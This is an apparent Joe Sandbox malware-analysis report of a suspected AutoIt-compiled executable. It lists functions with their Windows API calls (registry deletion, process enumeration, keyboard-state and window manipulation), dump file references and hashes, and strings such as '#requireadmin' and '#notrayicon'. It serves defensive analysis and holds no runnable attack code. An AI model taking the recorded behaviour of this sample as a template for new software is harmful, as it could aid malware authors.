                                                                                • FreeLibrary.KERNEL32(00000000), ref: 008A243E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                • String ID: @
                                                                                • API String ID: 4082843840-2766056989
                                                                                • Opcode ID: 3b99e6e5c2527da4ec62ab91eda83ffc380e9e9f359e987a71b045e21ee8ce7e
                                                                                • Instruction ID: a38844464ebc95f7d6e003fed0eb8da0fb25f223642463be1c9a9bc885410386
                                                                                • Opcode Fuzzy Hash: 3b99e6e5c2527da4ec62ab91eda83ffc380e9e9f359e987a71b045e21ee8ce7e
                                                                                • Instruction Fuzzy Hash: D3718D70A006199FDF25EFA8C88199EBBF5FF49310F108459E846EB761DB34AD40CB95
                                                                                Function 00883DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 00883DE7
                                                                                • GetKeyboardState.USER32(?), ref: 00883DFC
                                                                                • SetKeyboardState.USER32(?), ref: 00883E5D
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00883E8B
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00883EAA
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00883EF0
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00883F13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: 11a8fe5a8775a58031eece6d61efb23a53f790bc9a11aadaf101abf9b2e24054
                                                                                • Instruction ID: 3b72fcc831a4f78a4f2a1b9b46f51cdcd40c90fa2e2b57435fffed061279b8be
                                                                                • Opcode Fuzzy Hash: 11a8fe5a8775a58031eece6d61efb23a53f790bc9a11aadaf101abf9b2e24054
                                                                                • Instruction Fuzzy Hash: 2751E5A0A047D53DFB3663288C45BB67EA5BB06B04F084589F1D5C68C3D7E8AEC4D751
                                                                                Function 00883BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 00883C02
                                                                                • GetKeyboardState.USER32(?), ref: 00883C17
                                                                                • SetKeyboardState.USER32(?), ref: 00883C78
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00883CA4
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00883CC1
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00883D05
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00883D26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: d72c3c6f4d80c4aa0c6525c9255f8b02ae2280d9088cf6ccb02a20e4cc5f997c
                                                                                • Instruction ID: 06058445aa11055e743c4c0730a1bbb86b1bcea1c08790d0ba05ad0852c961ae
                                                                                • Opcode Fuzzy Hash: d72c3c6f4d80c4aa0c6525c9255f8b02ae2280d9088cf6ccb02a20e4cc5f997c
                                                                                • Instruction Fuzzy Hash: AA5107A15047D53DFB32A7388C55B76BFA9FF06B00F088488E0D5DA8C2D294EE84E761
                                                                                Function 00887DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsncpy$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 2945705084-0
                                                                                • Opcode ID: a48e5c55c8b69d29b4ba121b307b23108ad1f42cbcea08c2b35bce2f4e7f72da
                                                                                • Instruction ID: a2d6e052bcf988ec5cb3ed70cfde348480d5f0bb8a983ea1e48601809e39f543
                                                                                • Opcode Fuzzy Hash: a48e5c55c8b69d29b4ba121b307b23108ad1f42cbcea08c2b35bce2f4e7f72da
                                                                                • Instruction Fuzzy Hash: 03415266C1021876DB20ABF8CC4A9CF73BCFF04310F5549A6E504E3261EA34D614C7A6
                                                                                Function 008A3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 008A3DA1
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008A3DCB
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 008A3E80
                                                                                  • Part of subcall function 008A3D72: RegCloseKey.ADVAPI32(?), ref: 008A3DE8
                                                                                  • Part of subcall function 008A3D72: FreeLibrary.KERNEL32(?), ref: 008A3E3A
                                                                                  • Part of subcall function 008A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008A3E5D
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 008A3E25
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                • Opcode ID: 29bee221c9bcf6fec898542d03a2c4cb9a1e71aa0181538f16d15c250fe53ca8
                                                                                • Instruction ID: 6574174cf8469f1588064cc005c36d856a5eadf08ef47a356d078780b8a8fd89
                                                                                • Opcode Fuzzy Hash: 29bee221c9bcf6fec898542d03a2c4cb9a1e71aa0181538f16d15c250fe53ca8
                                                                                • Instruction Fuzzy Hash: F931CAB1901219BFEB159B94DC85EFFB7BCFB09300F00416AF512E2550D6749F499BA0
                                                                                Function 008A8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008A8FE7
                                                                                • GetWindowLongW.USER32(00C7DF38,000000F0), ref: 008A901A
                                                                                • GetWindowLongW.USER32(00C7DF38,000000F0), ref: 008A904F
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008A9081
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008A90AB
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 008A90BC
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008A90D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 244c0734cc2e3f0ee553bc912023f01727f106c09a619296d2559641109860e1
                                                                                • Instruction ID: 71037f5f730aedfd74726ef8bad6efe624b5604863093c878286ece92777be52
                                                                                • Opcode Fuzzy Hash: 244c0734cc2e3f0ee553bc912023f01727f106c09a619296d2559641109860e1
                                                                                • Instruction Fuzzy Hash: 98313274608215EFEB20CF58DC84F6437A9FB5A354F154164F699CB6B2CBB2A840DB81
                                                                                Function 008808AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008808F2
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00880918
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0088091B
                                                                                • SysAllocString.OLEAUT32(?), ref: 00880939
                                                                                • SysFreeString.OLEAUT32(?), ref: 00880942
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00880967
                                                                                • SysAllocString.OLEAUT32(?), ref: 00880975
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 762b1fca45724d86e88a9075c5df27a7280e05322ebd72f8d92a5614d55e14d7
                                                                                • Instruction ID: f0500421bcee50b91d9e338e24e60de9412e3e260830d295c71cc995c75757c9
                                                                                • Opcode Fuzzy Hash: 762b1fca45724d86e88a9075c5df27a7280e05322ebd72f8d92a5614d55e14d7
                                                                                • Instruction Fuzzy Hash: 6D219576601219AFAB50AF68DC88DAB77BCFB09360B008135FA15DB152D670EC498B64
                                                                                Function 00882472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 1038674560-2734436370
                                                                                • Opcode ID: 5588cc8829d1a4ee8f1be74a7d90d70fe07cbfa373a5094f62de131982e9982a
                                                                                • Instruction ID: 4709378001819ab5e83fb8e03d6020f46450919348494e5430f08e460c923a11
                                                                                • Opcode Fuzzy Hash: 5588cc8829d1a4ee8f1be74a7d90d70fe07cbfa373a5094f62de131982e9982a
                                                                                • Instruction Fuzzy Hash: FB21797228021577C731FA388C02EBB7398FF64304F20802AF846E7182E6559D42C3AA
                                                                                Function 00880986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008809CB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008809F1
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 008809F4
                                                                                • SysAllocString.OLEAUT32 ref: 00880A15
                                                                                • SysFreeString.OLEAUT32 ref: 00880A1E
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00880A38
                                                                                • SysAllocString.OLEAUT32(?), ref: 00880A46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 45a8c122db9dc0c641bf739ef590cfc5466f7a9bc63612f331f90c9af71c4b21
                                                                                • Instruction ID: bbe11281e1722d74732f22c0bb535d0626e05b8934e64cdf9bfb93abdfc38b9b
                                                                                • Opcode Fuzzy Hash: 45a8c122db9dc0c641bf739ef590cfc5466f7a9bc63612f331f90c9af71c4b21
                                                                                • Instruction Fuzzy Hash: C4214475604214AFDB54EFA8DC89DBAB7ECFF093607448135FA09CB261E670EC858B64
                                                                                Function 008ADE69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008ADEB0
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 008ADED4
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008ADEEC
                                                                                • GetSystemMetrics.USER32(00000004), ref: 008ADF14
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00893A1E,00000000), ref: 008ADF32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MetricsSystem
                                                                                • String ID: MZER
                                                                                • API String ID: 2294984445-2424380061
                                                                                • Opcode ID: 5743b4e647187fe8bd01b29b4a9bda0652ce68c8369904982793c26ddf64f865
                                                                                • Instruction ID: 86ac4538d8d853b7ac7e5c7a8c4956423d5132bf4b57846e6c9842b4dc7cf59a
                                                                                • Opcode Fuzzy Hash: 5743b4e647187fe8bd01b29b4a9bda0652ce68c8369904982793c26ddf64f865
                                                                                • Instruction Fuzzy Hash: 43219071615716AFEB205F789C48B6A77A8FB16329B150734F927CADE0DB709860CA80
                                                                                Function 008AA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                  • Part of subcall function 0085D17C: GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                  • Part of subcall function 0085D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008AA32D
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008AA33A
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008AA345
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008AA354
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008AA360
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: ac625e10836ef7a024fe7ed0a7419bf29ba18716f6e1fe2b38880ee41a9c9756
                                                                                • Instruction ID: 70fc8fd3a3b7c1a64f39c857f4dfafb4491ff420b98408bb0f8f06a2da298c0e
                                                                                • Opcode Fuzzy Hash: ac625e10836ef7a024fe7ed0a7419bf29ba18716f6e1fe2b38880ee41a9c9756
                                                                                • Instruction Fuzzy Hash: 5D115BB115021DBEEF159FA4CC86EEB7F6DFF09798F014115BA08A61A0C7729C21DBA4
                                                                                Function 0085CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 0085CCF6
                                                                                • GetWindowRect.USER32(?,?), ref: 0085CD37
                                                                                • ScreenToClient.USER32(?,?), ref: 0085CD5F
                                                                                • GetClientRect.USER32(?,?), ref: 0085CE8C
                                                                                • GetWindowRect.USER32(?,?), ref: 0085CEA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$Screen
                                                                                • String ID:
                                                                                • API String ID: 1296646539-0
                                                                                • Opcode ID: 2518edc41f641ecf546aac44d7b80fade1f34ddc23af4c71404105348a67b3f1
                                                                                • Instruction ID: b9671f93c5bf713ca3ca7a95bd68589ddba1c2b9bcce2bbeb61085b1dc6721e4
                                                                                • Opcode Fuzzy Hash: 2518edc41f641ecf546aac44d7b80fade1f34ddc23af4c71404105348a67b3f1
                                                                                • Instruction Fuzzy Hash: B2B1367990064ADFDB10CFA8C481BEEBBB1FF08345F149529EC59EB250DB30A955CB64
                                                                                Function 008A1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 008A1C18
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 008A1C26
                                                                                • __wsplitpath.LIBCMT ref: 008A1C54
                                                                                  • Part of subcall function 00861DFC: __wsplitpath_helper.LIBCMT ref: 00861E3C
                                                                                • _wcscat.LIBCMT ref: 008A1C69
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 008A1CDF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 008A1CF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1380811348-0
                                                                                • Opcode ID: 68e926bd5c248cf47b1ab298cb8c3c03cfd31b648ff280ddded0e538de60640c
                                                                                • Instruction ID: 2bb201b9b7b54e3b131e8f322fd85b8e369a87113e4c0c080d732fea6cac3f48
                                                                                • Opcode Fuzzy Hash: 68e926bd5c248cf47b1ab298cb8c3c03cfd31b648ff280ddded0e538de60640c
                                                                                • Instruction Fuzzy Hash: 9B513B711043449FD720EF68D885EABB7E8FF89754F04492EF985D7251EB70A904CB92
                                                                                Function 008A2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A30AF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008A30EF
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008A3112
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008A313B
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008A317E
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A318B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 3451389628-0
                                                                                • Opcode ID: 5e7e56f4100ce6d2f9693e7e8a22b1cd67effad806616de4cf023fca90cf7771
                                                                                • Instruction ID: 43fe1a31553117ddea7ffe286464142c80e47dca40af0f6ef5523e1b5a3b0b46
                                                                                • Opcode Fuzzy Hash: 5e7e56f4100ce6d2f9693e7e8a22b1cd67effad806616de4cf023fca90cf7771
                                                                                • Instruction Fuzzy Hash: 33512531208308AFD714EF68C885E6ABBE9FF89314F04492DF595D72A1DB71EA05CB52
                                                                                Function 008A84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 008A8540
                                                                                • GetMenuItemCount.USER32(00000000), ref: 008A8577
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008A859F
                                                                                • GetMenuItemID.USER32(?,?), ref: 008A860E
                                                                                • GetSubMenu.USER32(?,?), ref: 008A861C
                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 008A866D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
